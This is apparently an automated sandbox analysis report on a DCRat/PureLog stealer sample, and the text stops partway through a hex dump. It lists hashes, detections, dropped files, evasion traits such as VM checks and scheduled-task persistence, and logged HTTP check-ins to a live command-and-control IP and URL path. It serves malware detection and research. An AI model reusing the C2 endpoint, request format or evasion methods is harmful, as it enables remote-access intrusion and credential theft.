Windows Analysis Report
ZT3pxe2Tb4.exe

Overview

General Information

Sample name: ZT3pxe2Tb4.exe
renamed because original name is a hash value
Original sample name: 4164D5955C244FF266C1CC41013FE21A.exe
Analysis ID: 1417387
MD5: 4164d5955c244ff266c1cc41013fe21a
SHA1: cd4b6caab8b3762d3af3b7ad738f51d2e92c2d34
SHA256: 138905d6721c1e6b174b6f61154a938565c9bd5c6b5b0abe8274054bf151da9c
Tags: DCRat, exe

Detection

DCRat, PureLog Stealer, zgRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected unpacking (creates a PE file in dynamic memory)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
Creates processes via WMI
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Files With System Process Name In Unsuspected Locations
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Schtasks From Env Var Folder
Tries to load missing DLLs
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

AV Detection

Source: ZT3pxe2Tb4.exe Avira: detected
Source: C:\Users\user\AppData\Local\Temp\6WkFIbRMFr.bat Avira: detection malicious, Label: BAT/Runner.IK
Source: C:\Users\user\AppData\Local\Temp\I3W1TCNLwG.bat Avira: detection malicious, Label: BAT/Runner.IK
Source: C:\Users\user\AppData\Local\Temp\s2nU7uS06N.bat Avira: detection malicious, Label: BAT/Runner.IL
Source: C:\Users\user\Desktop\DACRVJoK.log Avira: detection malicious, Label: HEUR/AGEN.1362695
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\AppData\Local\Temp\ZMh4UPVO0I.bat Avira: detection malicious, Label: BAT/Runner.IL
Source: C:\Users\user\Desktop\CgRzmzKC.log Avira: detection malicious, Label: TR/PSW.Agent.qngqt
Source: C:\Users\user\AppData\Local\Temp\OwDUg2gYJx.bat Avira: detection malicious, Label: BAT/Runner.IK
Source: C:\Users\user\Desktop\ELDRalsN.log Avira: detection malicious, Label: HEUR/AGEN.1300079
Source: C:\Users\user\AppData\Local\Temp\wuC6fcDv5B.bat Avira: detection malicious, Label: BAT/Runner.IK
Source: C:\Users\user\AppData\Local\Temp\Gu3WPocxsu.bat Avira: detection malicious, Label: BAT/Runner.IL
Source: C:\Users\user\AppData\Local\Temp\7nxekELsf0.bat Avira: detection malicious, Label: BAT/Runner.IK
Source: C:\Users\user\Desktop\CGTrJaEm.log Avira: detection malicious, Label: TR/PSW.Agent.qngqt
Source: C:\Users\user\Desktop\AFOsBjYP.log Avira: detection malicious, Label: HEUR/AGEN.1300079
Source: C:\Users\user\AppData\Local\Temp\e2HUAivGfO.bat Avira: detection malicious, Label: BAT/Runner.IK
Source: C:\Users\user\AppData\Local\Temp\3IMqqsTTOd.bat Avira: detection malicious, Label: BAT/Runner.IK
Source: C:\Users\user\AppData\Local\fontdrvhost.exe ReversingLabs: Detection: 86%
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Virustotal: Detection: 72%
Source: C:\Users\user\Desktop\AFOsBjYP.log Virustotal: Detection: 19%
Source: C:\Users\user\Desktop\AaPSReOe.log Virustotal: Detection: 7%
Source: C:\Users\user\Desktop\CGTrJaEm.log ReversingLabs: Detection: 66%
Source: C:\Users\user\Desktop\CGTrJaEm.log Virustotal: Detection: 69%
Source: C:\Users\user\Desktop\COTaDrJc.log Virustotal: Detection: 21%
Source: C:\Users\user\Desktop\CTQIQVae.log Virustotal: Detection: 7%
Source: C:\Users\user\Desktop\CgRzmzKC.log ReversingLabs: Detection: 66%
Source: C:\Users\user\Desktop\CgRzmzKC.log Virustotal: Detection: 69%
Source: C:\Users\user\Desktop\CkrRJHNx.log Virustotal: Detection: 8%
Source: C:\Users\user\Desktop\DACRVJoK.log Virustotal: Detection: 7%
Source: C:\Users\user\Desktop\FWXhQVXq.log Virustotal: Detection: 19%
Source: C:\Users\user\Desktop\FWzHsBqG.log Virustotal: Detection: 7%
Source: ZT3pxe2Tb4.exe ReversingLabs: Detection: 86%
Source: ZT3pxe2Tb4.exe Virustotal: Detection: 73%
Source: C:\Users\user\Desktop\CTQIQVae.log Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\CkrRJHNx.log Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\AaPSReOe.log Joe Sandbox ML: detected
Source: ZT3pxe2Tb4.exe Joe Sandbox ML: detected

Compliance

Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Unpacked PE file: 0.2.ZT3pxe2Tb4.exe.1670000.5.unpack
Source: ZT3pxe2Tb4.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: ZT3pxe2Tb4.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbnet0l source: fontdrvhost.exe, 00000034.00000002.2239140021.0000000000885000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: fontdrvhost.exe, 00000008.00000002.1748627136.000000001BF60000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 0000000E.00000002.1845478401.000000001C9D2000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 00000015.00000002.2055064818.000000001B7E8000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 0000002A.00000002.2218891440.000000001BE82000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 00000033.00000002.2698860484.000000001B70B000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 00000034.00000002.2506178713.000000001BDD7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: em.pdbd source: fontdrvhost.exe, 00000022.00000002.2098127256.000000001C46A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbnnecg source: fontdrvhost.exe, 00000034.00000002.2239140021.0000000000885000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: em.pdb source: fontdrvhost.exe, 0000002A.00000002.2225604158.000000001CC92000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdb source: fontdrvhost.exe, 00000008.00000002.1748627136.000000001BF60000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 0000000E.00000002.1845478401.000000001C9D2000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 00000015.00000002.2055064818.000000001B7E8000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 0000002A.00000002.2218891440.000000001BE82000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 00000033.00000002.2698860484.000000001B70B000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 00000034.00000002.2506178713.000000001BDD7000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File opened: C:\Users\user
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File opened: C:\Users\user\AppData
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File opened: C:\Users\user\AppData\Local
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe Code function: 4x nop then mov dword ptr [ebp-04h], 7FFFFFFFh 0_2_00007FFD9BBCD16D
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 4x nop then mov dword ptr [ebp-04h], 7FFFFFFFh 8_2_00007FFD9BBAD16D
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 4x nop then jmp 00007FFD9BA21F76h 9_2_00007FFD9BA21D6E
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 4x nop then mov dword ptr [ebp-04h], 7FFFFFFFh 14_2_00007FFD9BBDD16D
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 4x nop then jmp 00007FFD9BA01F76h 21_2_00007FFD9BA01D6E
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 4x nop then mov dword ptr [ebp-04h], 7FFFFFFFh 21_2_00007FFD9BBAD16D
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 4x nop then mov dword ptr [ebp-04h], 7FFFFFFFh 27_2_00007FFD9BBBD16D
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 4x nop then mov dword ptr [ebp-04h], 7FFFFFFFh 34_2_00007FFD9BB9D16D
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 4x nop then jmp 00007FFD9BA21F76h 35_2_00007FFD9BA21D6E
Source: C:\Users\user\AppData\Local\fontdrvhost.exe Code function: 4x nop then mov dword ptr [ebp-04h], 7FFFFFFFh 35_2_00007FFD9BBCD16D

Networking

Source: Traffic Snort IDS: 2048095 ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) 192.168.2.4:49730 -> 89.23.98.225:80
Source: Traffic Snort IDS: 2048095 ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) 192.168.2.4:49731 -> 89.23.98.225:80
Source: Traffic Snort IDS: 2048095 ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) 192.168.2.4:49738 -> 89.23.98.225:80
Source: Traffic Snort IDS: 2048095 ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) 192.168.2.4:49740 -> 89.23.98.225:80
Source: Traffic Snort IDS: 2048095 ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) 192.168.2.4:49741 -> 89.23.98.225:80
Source: Traffic Snort IDS: 2048095 ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) 192.168.2.4:49742 -> 89.23.98.225:80
Source: Traffic Snort IDS: 2048095 ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) 192.168.2.4:49744 -> 89.23.98.225:80
Source: Traffic Snort IDS: 2048095 ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) 192.168.2.4:49745 -> 89.23.98.225:80
Source: Traffic Snort IDS: 2048095 ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) 192.168.2.4:49746 -> 89.23.98.225:80
Source: Traffic Snort IDS: 2048095 ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) 192.168.2.4:49749 -> 89.23.98.225:80
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: Joe Sandbox View ASN Name: MAXITEL-ASRU
Source: global traffic HTTP traffic detected: POST /8pollDbvoiddb/DatalifeFlowerWp/processbaseMariadb1/Defaultbigloadpython/Generator/videoLowUpdateDbasync.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 89.23.98.225Content-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /8pollDbvoiddb/DatalifeFlowerWp/processbaseMariadb1/Defaultbigloadpython/Generator/videoLowUpdateDbasync.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 89.23.98.225Content-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /8pollDbvoiddb/DatalifeFlowerWp/processbaseMariadb1/Defaultbigloadpython/Generator/videoLowUpdateDbasync.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 89.23.98.225Content-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /8pollDbvoiddb/DatalifeFlowerWp/processbaseMariadb1/Defaultbigloadpython/Generator/videoLowUpdateDbasync.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.98.225Content-Length: 336Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /8pollDbvoiddb/DatalifeFlowerWp/processbaseMariadb1/Defaultbigloadpython/Generator/videoLowUpdateDbasync.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 89.23.98.225Content-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /8pollDbvoiddb/DatalifeFlowerWp/processbaseMariadb1/Defaultbigloadpython/Generator/videoLowUpdateDbasync.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 89.23.98.225Content-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /8pollDbvoiddb/DatalifeFlowerWp/processbaseMariadb1/Defaultbigloadpython/Generator/videoLowUpdateDbasync.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 89.23.98.225Content-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /8pollDbvoiddb/DatalifeFlowerWp/processbaseMariadb1/Defaultbigloadpython/Generator/videoLowUpdateDbasync.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 89.23.98.225Content-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /8pollDbvoiddb/DatalifeFlowerWp/processbaseMariadb1/Defaultbigloadpython/Generator/videoLowUpdateDbasync.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 89.23.98.225Content-Length: 336Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /8pollDbvoiddb/DatalifeFlowerWp/processbaseMariadb1/Defaultbigloadpython/Generator/videoLowUpdateDbasync.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 89.23.98.225Content-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /8pollDbvoiddb/DatalifeFlowerWp/processbaseMariadb1/Defaultbigloadpython/Generator/videoLowUpdateDbasync.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 89.23.98.225Content-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /8pollDbvoiddb/DatalifeFlowerWp/processbaseMariadb1/Defaultbigloadpython/Generator/videoLowUpdateDbasync.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 89.23.98.225Content-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /8pollDbvoiddb/DatalifeFlowerWp/processbaseMariadb1/Defaultbigloadpython/Generator/videoLowUpdateDbasync.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 89.23.98.225Content-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 89.23.98.225
Source: unknown HTTP traffic detected: POST /8pollDbvoiddb/DatalifeFlowerWp/processbaseMariadb1/Defaultbigloadpython/Generator/videoLowUpdateDbasync.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 89.23.98.225Content-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 29 Mar 2024 06:37:01 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 29 Mar 2024 06:37:10 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 29 Mar 2024 06:37:19 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 29 Mar 2024 06:37:23 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 